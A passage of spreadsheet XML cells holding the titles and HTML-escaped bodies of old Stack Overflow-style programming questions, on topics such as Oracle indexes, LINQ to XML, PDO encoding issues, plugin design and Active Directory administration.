    <t xml:space="preserve">&lt;p&gt;When I want an array of flags it has typically pained me to use an entire byte (or word) to store each one, as would be the result if I made an array of &lt;code&gt;bool&lt;/code&gt;s or some other numeric type that could be set to 0 or 1. But now I wonder whether using a structure that is more space-efficient is worth it given the (albeit hopefully very slight) additional overhead of shifting and bit testing.&lt;/p&gt;
&lt;p&gt;In my company we use Rogue Wave tools (though hopefully not for much longer) and it's their &lt;code&gt;RWBitVec&lt;/code&gt; that I've used for this purpose up until now.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>TCustomDataSet C++ Builder</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for an example of a TCustomDataSet implementation in C++ beyond the TTextDataset example that ships as an example project within C++ Builder.&lt;/p&gt;
&lt;p&gt;The TTextDataset is hard to learn from because the code is not documented very well and it only shows a single field example.&lt;/p&gt;
&lt;p&gt;I've created my own class that descends TDataSet and it mostly works however, the GUI controls (grids mostly) don't work 100% for certain use cases.&lt;/p&gt;
&lt;p&gt;Anyone have some good links on this topic...&lt;/p&gt;
&lt;p&gt;Here is a link to the example code I used to study from:
&lt;a href="http://195.19.138.139:3000/p/SOFTWARE/temp/CBuilder5/Examples/DBTasks/TextData/textdataset.cpp" rel="nofollow"&gt;http://195.19.138.139:3000/p/SOFTWARE/temp/CBuilder5/Examples/DBTasks/TextData/textdataset.cpp&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ruby and duck typing: design by contract impossible?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Method signature in Java:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public List&amp;lt;String&amp;gt; getFilesIn(List&amp;lt;File&amp;gt; directories)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;similar one in ruby&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def get_files_in(directories)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In the case of Java, the type system gives me information about what the method expects and delivers.  In Ruby's case, I have &lt;strong&gt;no&lt;/strong&gt; clue what I'm supposed to pass in, or what I'll expect to receive.&lt;/p&gt;
&lt;p&gt;In Java, the object must formally implement the interface.  In Ruby, the object being passed in must respond to whatever methods are called in the method defined here.  &lt;/p&gt;
&lt;p&gt;This seems highly problematic:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Even with 100% accurate, up-to-date documentation, the Ruby code has to essentially expose its implementation, breaking encapsulation.  "OO purity" aside, this would seem to be a maintenance nightmare.&lt;/li&gt;
&lt;li&gt;The Ruby code gives me &lt;strong&gt;no&lt;/strong&gt; clue what's being returned; I would have to essentially experiment, or read the code to find out what methods the returned object would respond to.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Not looking to debate static typing vs duck typing, but looking to understand how you maintain a production system where you have almost no ability to design by contract.&lt;/p&gt;
&lt;h3&gt;Update&lt;/h3&gt;
&lt;p&gt;No one has really addressed the exposure of a method's internal implementation via documentation that this approach requires.  Since there are no interfaces, if I'm not expecting a particular type, don't I have to itemize every method I might call so that the caller knows what can be passed in?  Or is this just an edge case that doesn't really come up?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Design Pattern for implementing plugins in your application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the standard way for allowing and implementing a plugin system for your application?&lt;/p&gt;
&lt;p&gt;In my last application I made a simple interface for all plugins that they must implement.  I then load all assemblies in the apps directory and toss out any that don't implement that interface.&lt;/p&gt;
&lt;p&gt;One of the methods in the interface is a DoWork() method that periodically gets called on all loaded assemblies to perform any actions the plugins may have.&lt;/p&gt;
&lt;p&gt;What is the "proper" way to do a plugin system?  Do you just create an Interface for plugins?  Should you periodically call a particular method in all plugins?  Is there a more sophisticated way?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;p&gt;Thank you Matt Hamilton for the reference to the System.Addin namespace.  This will most likely be the way I implement my plugins.  However, I am still curious about plugin architecture in general and wouldn't mind some background on the best way they should be designed, implmemented.. how you should call on them once loaded, etc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Skipping the 'CompressResources' build step for XCode iPhone apps</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to set an iPhone XCode project to skip the 'CompressResources' build step?&lt;/p&gt;
&lt;p&gt;Specifically, I want to skip the stage where it runs pngcrush on all of my .png files, many of which don't survive the experience in a form which my app can read.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; the version of pngcrush used creates png files which contain a non-standard 'mandatory, private' chunk which explicitly prevents decoding. I've modified my png reader to handle these files, but I'd still like a per-project method of skipping this step. One of the other side effects of pngcrush is that it doesn't save the colour value of transparent pixels, so alpha-ed textures show fringing at smaller mip levels.&lt;/p&gt;
&lt;p&gt;The iphone png format is described here: &lt;a href="http://modmyi.com/wiki/index.php/Iphone_PNG_images"&gt;http://modmyi.com/wiki/index.php/Iphone_PNG_images&lt;/a&gt;. In short,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Skip the CgBI chunk&lt;/li&gt;
&lt;li&gt;Skip the zlib headers&lt;/li&gt;
&lt;li&gt;Swap BGR to RGB channel order&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; It appears it also premultiplies the alpha, so:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Divide by alpha&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How to use a function-based index on a column that contains NULLs in Oracle 10+?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Lets just say you have a table in Oracle:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE person (
  id NUMBER PRIMARY KEY,
  given_names VARCHAR2(50),
  surname VARCHAR2(50)
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;with these function-based indices:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE INDEX idx_person_upper_given_names ON person (UPPER(given_names));
CREATE INDEX idx_person_upper_last_name ON person (UPPER(last_name));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, given_names has no NULL values but for argument's sake last_name does.  If I do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * FROM person WHERE UPPER(given_names) LIKE 'P%'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the explain plan tells me its using the index but change it to:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * FROM person WHERE UPPER(last_name) LIKE 'P%'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;it doesn't.  The Oracle docs say that to use the function-based index will only be used when several conditions are met, one of which is ensuring there are no NULL values since they aren't indexed.&lt;/p&gt;
&lt;p&gt;I've tried these queries:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * FROM person WHERE UPPER(last_name) LIKE 'P%' AND UPPER(last_name) IS NOT NULL
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * FROM person WHERE UPPER(last_name) LIKE 'P%' AND last_name IS NOT NULL
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In the latter case I even added an index on last_name but no matter what I try it uses a full table scan.  Assuming I can't get rid of the NULL values, how do I get this query to use the index on UPPER(last_name)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any viewstate implementation for JSP-Servlet app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Do you know any implementation / technique which would provide similar behavior as Viewstate provides in ASP.NET. (Serializing the data into hidden field within the HTML form).&lt;/p&gt;
&lt;p&gt;I am using only JSP, Servlet, and Spring MVC.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the alternatives to using Expand in a LINQ to ADO.net Data Service Query?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am wondering if there are any alternatives to using the Expand key word when performing an LINQ to ADO.net Data Services query.  The expand method does get me the data I am interested in, but it requires me to know all of the sub-objects that I am going to be working with in advance.  My absolute preference would be that those sub-objects would be lazy loaded for me when I access them, but this doesn't look to be an option (I could add this lazy loading to the get on that sub-object property, but it gets wiped out when I do an update of the data service reference).&lt;/p&gt;
&lt;p&gt;Does anyone have any suggestions/best practices/alternatives for this situation?  Thanks.&lt;/p&gt;
&lt;p&gt;===== Example Code using Member that has a MailingAddress =====&lt;/p&gt;
&lt;p&gt;Works:    &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var me = (from m in ctx.Member.Expand("MailingAddress")
          where m.MemberID == 10000
          select m).First();
MessageBox.Show(me.MailingAddress.Street);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Would Prefer (would really like if this then went and loaded the MailingAddress)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var me = (from m in ctx.Member
          where m.MemberID == 10000
          select m).First();
MessageBox.Show(me.MailingAddress.Street);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or at least (note: something similar to this, with MailingAddressReference, works on the server side if I do so as LINQ to Entities in a Service Operation)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var me = (from m in ctx.Member
          where m.MemberID == 10000
          select m).First();
if (!(me.MailingAddress.IsLoaded())) me.MailingAddress.Load()
MessageBox.Show(me.MailingAddress.Street);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I estimate SQL Server index sizes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;While estimating straight row and table sizes are fairly simple math, we find it challenging to guess just how much space each index will occupy (for a given table size). What areas can we learn to calculate a better estimate and growth rate for indexes?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SecurityException thrown when app starts from remote folder</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an app written in C# that lies on a network share. When I run it from a local drive, everything works fine. When I start it from the remote share, calls like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;try
{
    System.Reflection.Assembly.GetExecutingAssembly();
    System.IO.Directory.GetCurrentDirectory();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;throw a SecurityException 'Request failed'.&lt;/p&gt;
&lt;p&gt;What causes this, what is the difference between an app that is started locally and one that is started from a remote location?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Lock / Prevent edit of source files on Linux using C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I programmatically lock/unlock, or otherwise prevent/enable editing, a source file on Linux using C++.&lt;/p&gt;
&lt;p&gt;I want to be able to lock source file so that if I open it in an editor it will not allow me to save back to the same source file.&lt;/p&gt;
&lt;p&gt;I am thinking of maybe changing the permissions to read-only (and change it back to read-write later): how do I do that from C++?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best language for a non-programmer tech support person to learn</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a colleague that handles tech support, and her role involves a lot of transforming ASCII files from one format to another and occasionally reporting on them.  The formats tend to be largely plain text with an occasional bit of XML.  She regularly gets me to write small scripts to do these transformatsions, and also batch files for repeating the operation for collections of files in different locations.  Currently she uses Crystal Reports to do much of this but it is a bit of a dog.&lt;/p&gt;
&lt;p&gt;Could anyone recommend a language, or alternative tool, that she could learn to become more self reliant in this role.  It must primarily be very easy to learn at a starting out level, be good at manipulating text files, and run in a Windows environment.  Ideally, it would also be freely available, such that she could pass her scripts onto her end users.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>LINQ to XML gets no data with schema set</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to get some XML data with LINQ, but running into a problem.&lt;/p&gt;
&lt;p&gt;I am using a schema, which is set in the attribute xmlns ...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;CarsForSale xmlns="http://schemas.sharplogic.net/CarSales.xsd"&amp;gt;
  &amp;lt;CarForSale&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There are many CarForSale elements.&lt;/p&gt;
&lt;p&gt;When the schema is set and I do this...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;XElement doc = XElement.Load(HttpContext.Current.Server.MapPath("App_Data/XML/CarsForSale.xml"));
var cars2 = from d in doc.Descendants("CarForSale")
            select d;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I get in the results i get Enumeration yielded no results &lt;/p&gt;
&lt;p&gt;Strip the xmlns out of the XML file and the data comes back as expected??&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
&lt;p&gt;Thx&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Questions about exporting and importing flatfiles (txt, csv) in SQL Server 2005</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ol&gt;
&lt;li&gt;What's the best delimiter to use when exporting data?&lt;/li&gt;
&lt;li&gt;What's the best way to work with NULL data if you have an INT field in the table?&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Accessing python egg's own metadata</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've produced a python egg using setuptools and would like to access it's metadata at runtime. I currently got working this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import pkg_resources
dist = pkg_resources.get_distribution("my_project")
print(dist.version)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but this would probably work incorrectly if I had multiple versions of the same egg installed. And if I have both installed egg and development version, then running this code from development version would pick up version of the installed egg. &lt;/p&gt;
&lt;p&gt;So, how do I get metadata for &lt;em&gt;my&lt;/em&gt; egg not some random matching egg installed on my system? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Compiling in c++ with mysql, pthreads and gtk</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Have someone ever done this before???&lt;/p&gt;
&lt;p&gt;I am trying to use MinGW to compile a program using the MySQL libraries. I keep getting the message that the function 'rint' is redefined. Ok it's true that the function is in both files config-win.h, from MySQL and math.h from the standard library, but both of them are suppose to be libraries with no problems.&lt;/p&gt;
&lt;p&gt;After breaking my head a while i tried even this, that wont compile: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;iostream&amp;gt;
#include &amp;lt;my_global.h&amp;gt;
#include &amp;lt;mysql.h&amp;gt;
using namespace std;
int main() {
    cout &amp;lt;&amp;lt; "Hello World!!!" &amp;lt;&amp;lt; endl; // prints Hello World!!!
    return 0;   
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And this is the command as well as the output i issue for compiling&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;i586-mingw32msvc-cc -I/usr/include/mysql probando.cpp -w&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;In file included from /usr/include/mysql/my_global.h:73,
                 from probando.cpp:10:
/usr/include/mysql/config-win.h: In function â€˜double rint(double)â€™:
/usr/include/mysql/config-win.h:229: error: redefinition of â€˜double rint(double)â€™
/usr/lib/gcc/i586-mingw32msvc/4.2.1-sjlj/../../../../i586-mingw32msvc/include/math.h:635: error: â€˜double rint(double)â€™ previously defined here
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have tested it both in WindowsXP with MinGW, with the MySQL libraries properly transformed in .a libraries and in Linux (the output is from Linux, pretty much the same than in Windows) with  MinGW32.&lt;/p&gt;
&lt;p&gt;People... I am running out of options... Any clues?? Has someone worked before with MySQL and MinGW?? May it work with Cygwin?? &lt;/p&gt;
&lt;p&gt;Thanks in advance if you take the time to answer.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to get DateTime value from timestamp type column?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a select from table which does not have column that tells when row was inserted, only &lt;code&gt;timestamp&lt;/code&gt; column (values like: 0x0000000000530278). Some data was imported to the table yesterday and now I need to find out what exactly was imported :(&lt;/p&gt;
&lt;p&gt;Is there a way to do it using only &lt;code&gt;timestamp&lt;/code&gt; info? &lt;a href="http://www.sqlhacks.com/index.php/Dates/Timestamp"&gt;Here&lt;/a&gt; I found that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Timestamp is a 8 bytes sequential Hex number, that has nothing to do with neither the date nor the time.&lt;/li&gt;
&lt;li&gt;To get the current value of timestamp, use: @@DBTS.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Perhaps there is a way to find what was &lt;code&gt;timestamp&lt;/code&gt; value around specific time? That would help to form a select. Or maybe there is a well known solution?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I embed a Google map into a Flash website?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to include a Google map in a Flash site I am building. I would like to retain as much of the zoom, print, copy/send url, direction functionality as is practically possible. Please could somebody advise the best way to do this? Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DDD and Asynchronous Repositories</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're working on a rich client (written in Flex) that is connected to a Java backend, using both RMI and JMS. I was thinking about implementing the client in a DDD fashion so that it has Repositories for the CRUD operations on the domain objects.&lt;/p&gt;
&lt;p&gt;The problem is however that all backend communication happens asynchronous and there is no way for me to force the client for waiting to continue untill it received a response. That means that, at a low level, I can call a method on a Remote Object and I get a AsyncToken as a return value. I can then listen to events on the asynctoken to see whether the call has passed or failed. This however breaks the main idea behind a repository, to hide the technical details from the client.&lt;/p&gt;
&lt;p&gt;There might be 2 options I guess:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;have the methods on the repository return the asynctoken, which seems like a messy solution to me&lt;/li&gt;
&lt;li&gt;have the methods return an empty collection (for a findAll for instance) that will get filled when the response is received.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Both have pros and cons and I would like to get some input from you guys.&lt;/p&gt;
&lt;p&gt;(taking this further, what would be good caching strategies? Dependind on the situation, I don't want the repository to call the server each time I request all entities from it. How would that affect the signature of the methods on the repository.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to remember technical knowledge in the organization</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ul&gt;
&lt;li&gt;Do we use a company wiki?&lt;/li&gt;
&lt;li&gt;how about you save the technical documents as part of source control and then have links to them from various source files (to understand how this works see article ... in directory...)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;what are the pros and cons of these and other methods?
any good tools for this purpose?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;If you recommend a wiki,&lt;/strong&gt;
what Wikis would you recommend to use?
internal? hosted? free? paid?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>IP subnet verification in JSP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following JSP code, that protects my web page and displays it only to know IP's&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;String ip_h = request.getRemoteAddr();  
String host_h = request.getRemoteHost();  
String iplist[] = new String[1];  
iplist[0] = "127.0.0.1";  
iplist[1] = "10.217.106.248";  
int count = iplist.length;  
boolean flag = false;  
int zz = 0;  
//return;
System.out.println(host_h);  
while ( (flag==false) &amp;amp;&amp;amp; ( zz &amp;lt; count) )  
{  
   if (ip_h.equals(iplist[zz]) || host_h.equals(iplist[zz]) )  
   {  
      flag = true;  
   }  
   zz++;  
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, I would to rather check for subnet ranges, i.e. all users belonging to 10.217.0.0/16 are allowed.&lt;/p&gt;
&lt;p&gt;How do I do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>User configurable security in multi-tenant ASP.NET website</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are building a multi-tenant website in ASP.NET, and we must let each customer configure their own security model.  They must be able to define their own roles, and put users in those roles.  What is the best way to do this?&lt;/p&gt;
&lt;p&gt;There are tons of simple examples of page_load events that have code like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  if (!user.InGroup("Admin")
       Response.Redirect("/NoAccess.aspx");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But that hard codes the groups and permissions in the code.  How can I make it user configurable?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>asp.net : IIS Service Unavailable</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I attempt to update the code on a IIS webserver by replacing the old code with my new code, I receive 503 Service Unavailable replys when attempting to access any of the replaced pages on the server.  &lt;/p&gt;
&lt;p&gt;What is the cause of this failure and what steps can I take to correct such errors? &lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Paver 0.8.1 compatibility with python 2.6</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone manage to bootstrap its development area using paver with python 2.6 ?&lt;/p&gt;
&lt;p&gt;I have install python 2.6, install paver with easy_install-2.6, everything looks fine.
But when I try to launch the bootstrap method it raises an urllib2.HTTPError (: HTTP Error 404: Not Found) while trying to download &lt;a href="http://pypi.python.org/packages/2.6/s/setuptools/setuptools-0.6c8-py2.6.egg" rel="nofollow"&gt;http://pypi.python.org/packages/2.6/s/setuptools/setuptools-0.6c8-py2.6.egg&lt;/a&gt;.
I have tryed to add the correct setuptools EGG file (which is 0.6c9) in the support-files directory, bootstrap.py find the EGG file, but doesn't seem to use it because it still try to download the 0.6c8 version which is no more available.&lt;/p&gt;
&lt;p&gt;Any ideas how to solve this issue ?&lt;/p&gt;
&lt;p&gt;Thanks in advance &lt;/p&gt;
&lt;p&gt;Bertrand&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do you validate your URL variables?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When you're passing variables through your site using GET requests, do you validate (regular expressions, filters, etc.) them before you use them?&lt;/p&gt;
&lt;p&gt;Say you have the URL &lt;a href="http://www.example.com/i=45&amp;amp;p=custform" rel="nofollow"&gt;http://www.example.com/i=45&amp;amp;p=custform&lt;/a&gt;. You know that "i" will always be an integer and "p" will always contain only letters and/or numbers. Is it worth the time to make sure that no one has attempted to manipulate the values and then resubmit the page?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I create a keyboard hook with a different thread in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm creating a low level keyboard hook in c# using SetWindowsHookEx, question is how can I make the on keyboard event function run on a thread other from the main thread? Also I currently don't have a thread other then the main thread, so how can I create one that will halt until a keyboard hook event will occur?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP/PDO and SQL Server connection and i18n issues</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In our web-app we use PHP5.2.6 + PDO to connect to a SQL Server 2005 database and store Russian texts.&lt;/p&gt;
&lt;p&gt;Database collation is &lt;code&gt;Cyrillic_General_CI_AS&lt;/code&gt;, table collation is &lt;code&gt;Cyrillic_General_CI_AS&lt;/code&gt;, column type is &lt;code&gt;NVARCHAR(MAX)&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;We tried connecting to a database using two following schemes, both causing different problems.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;em&gt;PDO mssql:&lt;/em&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$dbh = new PDO ('mssql:host='.$mssql_server.';dbname='.$mssql_db, $mssql_login, $mssql_pwd);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in which case a result of a simple query like that:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT field1 FROM tbl1 WHERE id=1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;shows &lt;code&gt;field1&lt;/code&gt; data truncated to 255 bytes.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;em&gt;PDO odbc:&lt;/em&gt; &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$dbh = new PDO ('odbc:DSN=myDSN;UID='.$mssql_login.';PWD='.$mssql_pwd);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in which case a result of the same query shows full not truncated data but with question marks instead of Russian symbols. &lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Notes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;In the SQL Management Studio data is not truncated and Russian symbols are displayed properly as well.&lt;/li&gt;
&lt;li&gt;We have Windows 2003 Enterprise Edition SP2&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So what should we choose as a connection method and how to fix corresponding issues?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>bind Linux to Active Directory using kerberos</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are trying to bind a Linux machine (debian 4.0) to W2k3 AD.  We have configured kerberos properly so that we can get TGTs.  And users authenticate properly.  However, PAM seems to be the sticky wicket.  For example when we try to SSH to the linux machine as one of the AD users, the authentication succeeds (as per the auth.log) but I never get shell.  The default environment is configured properly and PAM even creates the Homedir properly.  As a reference we were loosely following:&lt;/p&gt;
&lt;p&gt;https://help.ubuntu.com/community/ActiveDirectoryHowto&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Microsoft ReportViewer: Session Expired Errors</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The project is ASP.NET 2.0, I have never been able to reproduce this myself, but I get emails informing me it happens to clients many times a week, often a few times in a row.&lt;/p&gt;
&lt;p&gt;Here is the full error:&lt;/p&gt;
&lt;p&gt;Exception Details: &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Microsoft.Reporting.WebForms.AspNetSessionExpiredException: ASP.NET session has expired&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Stack Trace: &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;[AspNetSessionExpiredException: ASP.NET session has expired]
     at Microsoft.Reporting.WebForms.ReportDataOperation..ctor()
     at Microsoft.Reporting.WebForms.HttpHandler.GetHandler()
     at Microsoft.Reporting.WebForms.HttpHandler.ProcessRequest(HttpContext context)
     at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
     at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean&amp;amp; completedSynchronously) 
  Session Objects:75de8e1d65ff40d1ba666d940af5b118: Microsoft.Reporting.WebForms.ReportHierarchy
  5210064be1fa4d6abf5dd5e56b262974: Microsoft.Reporting.WebForms.ReportHierarchy&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>ASP.NET xsd dataset where do I put it</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to convert an ASP.NET website into a web application project. The conversion has gone ok I think apart from previously I had 2 xsd files in the App_Code folder. I believe this folder is not used in web applications projects, so where would I put xsd files now.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generic, annotation-driven event notification frameworks</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;While simple, interface-driven event notification frameworks in Java have been around since pre-Cambrian times (e.g. java.beans.PropertyChangeSupport), it is becoming increasingly popular for frameworks to use annotation-driven event notification instead.  &lt;/p&gt;
&lt;p&gt;For an example, see &lt;a href="http://www.jboss.org/file-access/default/members/jbosscache/freezone/docs/2.2.0.GA/userguide_en/html_single/index.html#api.listener"&gt;JBossCache 2.2&lt;/a&gt;. The listener class has its listener methods annotated, rather than conforming to a rigid interface. This is rather easier to program to, and easier to read, since you don't have to write empty implementations of listener callbacks that you're not interested in (and yes, I know about listener adapter superclasses).&lt;/p&gt;
&lt;p&gt;Here's a sample from the JBossCache docs:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@CacheListener
public class MyListener {
   @CacheStarted
   @CacheStopped
   public void cacheStartStopEvent(Event e) {
         switch (e.getType()) {
            case Event.Type.CACHE_STARTED:
               System.out.println("Cache has started");
               break;    
            case Event.Type.CACHE_STOPPED:    
               System.out.println("Cache has stopped");
               break;    
         }
   }    
   @NodeCreated    
   @NodeRemoved
   @NodeVisited
   @NodeModified
   @NodeMoved
   public void logNodeEvent(NodeEvent ne) {
         log("An event on node " + ne.getFqn() + " has occured");
   }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;}&lt;/p&gt;
&lt;p&gt;The problem with this, is that it's very much more of an involved process writing the framework to support this sort of thing, due to the annotation-reflection nature of it.&lt;/p&gt;
&lt;p&gt;So, before I charge off down the road of writing a generic framework, I was hoping someone had done it already. Has anyone come across such a thing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Lock Active Directory accounts programmatically</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to lock user accounts in Active Directory programmatically in C#. &lt;/p&gt;
&lt;p&gt;Unfortunately it doesn't work via the userAccountControl attribute. Every time I set userAccountControl to 528 (=normal account w/ lockout flag), Active Directory won't accept the value and resets it without further notice to 512 (=normal account).&lt;/p&gt;
&lt;p&gt;Now I tried to lock the account by providing incorrect credentials (see below), but this doesn't work either.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int retries = 0;
while (!adsUser.IsAccountLocked &amp;amp;&amp;amp; retries &amp;lt; MAX_LOCK_RETRIES)
{
     retries++;
    try
    {  
        new DirectoryEntry(userPath, logonName, incorrectPassword).RefreshCache();
    }
    catch (Exception)
    { 
        /* ... */ 
    }
    adsUser.GetInfo();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Compiler could not choose an overload between interface and exception</t>
  </si>
  <si>
